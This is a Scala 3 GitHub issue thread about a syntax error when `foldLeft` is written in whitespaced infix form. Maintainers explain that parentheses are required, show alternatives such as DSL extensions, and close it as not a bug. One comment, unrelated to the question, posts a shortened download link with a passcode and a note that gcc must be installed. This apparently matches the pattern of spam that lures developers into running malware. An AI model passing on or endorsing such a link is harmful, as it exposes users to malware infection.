### ISSUE TITLE
`foldLeft` syntax error with whitespaced infix

### ISSUE THREAD

**Issue by spaceunifyfifty** [scala/scala3#21550]
## Compiler version

3.3.3
## Minimized code
fails
```scala 
val s = Seq(1,2,3) foldLeft(0) {(a, b) => a + b}
//     expression does not take parameters
```
works
```scala
val s = Seq(1, 2, 3).foldLeft(0) { (a, b) => a + b }
```

This is problematic because requiring the dot notation creates inconsistency in codebases that use whitespaced infix for other higher-order functions like `filter`/`map`/`forall`. 
```scala
foos map: foo =>
  bars filter: bar =>
    kors exists: kor =>
      qens.foldLeft(0): (a, b) =>
      //  ^ sudden inconsistency. Not ideal.
```
Is this a bug, or intended behavior? I think infix notation reads considerably better for series of higher order function transformations, but this edge case discourages me from using it for the sake of consistency.

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by Gedochao** [comment]
@spaceunifyfifty I believe you're just using it incorrectly. 
With the infix syntax and 2 parameter lists, you have to explicitly use brackets here, I think.

The following will compile.
```scala
val s = (Seq(1,2,3) foldLeft 0) { (a, b) => a + b}
```

It is also equal to the dot notation you mentioned.

```scala
val s1 = (Seq(1,2,3) foldLeft 0) { (a, b) => a + b}
val s2 = Seq(1, 2, 3).foldLeft(0) { (a, b) => a + b }
assert(s1 == s2)
println(s1) // 6
```

**Comment by som-snytt** [comment]
I'm not so hardcore but
```
scala> (1 to 10) `foldLeft` 0 `apply` ((a,x) => a + x)
val res0: Int = 55

scala> class DSL[A, B](xs: Seq[A], z: B) { infix def into(op: (B, A) => B): B = xs.foldLeft(z)(op) }
// defined class DSL

scala> extension [A](as: Seq[A]) infix def foldilocks[B](z: B): DSL[A, B] = new DSL(as, z)
def foldilocks[A](as: Seq[A])[B](z: B): DSL[A, B]

scala> 1.to(10) foldilocks 0 into ((a,x) => a + x)
val res1: Int = 55

scala> extension [A](as: Seq[A]) infix def foldLeftZero[B](op: (B, A) => B): B = as.foldLeft(null.asInstanceOf[B])(op)
def foldLeftZero[A](as: Seq[A])[B](op: (B, A) => B): B

scala> 1.to(10) foldLeftZero ((a: Int,x: Int) => a + x)
val res2: Int = 55
```
That is easier as `reduce`; you can't do "infix type arg" in Scala 3 `x op [B] f`.

**Comment by Gedochao** [comment]
Either way, closing this, there's no bug to be fixed.
